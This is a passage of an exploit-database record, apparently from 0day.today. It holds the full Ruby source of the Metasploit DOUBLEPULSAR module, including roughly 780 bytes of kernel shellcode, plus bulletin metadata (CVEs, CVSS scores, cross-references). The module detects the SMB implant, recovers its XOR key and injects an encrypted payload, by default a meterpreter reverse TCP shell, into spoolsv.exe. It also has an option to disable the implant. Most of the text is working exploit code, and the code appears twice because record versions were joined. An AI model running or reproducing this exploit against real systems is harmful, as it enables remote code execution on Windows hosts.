adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are 
required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], 
datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = 
setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n 
\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n 
\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T13:26:49", "differentElements": ["title"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "961a5474828a43bfaaaf283f267e93f6", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module 
executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-01T16:40:01", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", 
"sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' 
=> 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
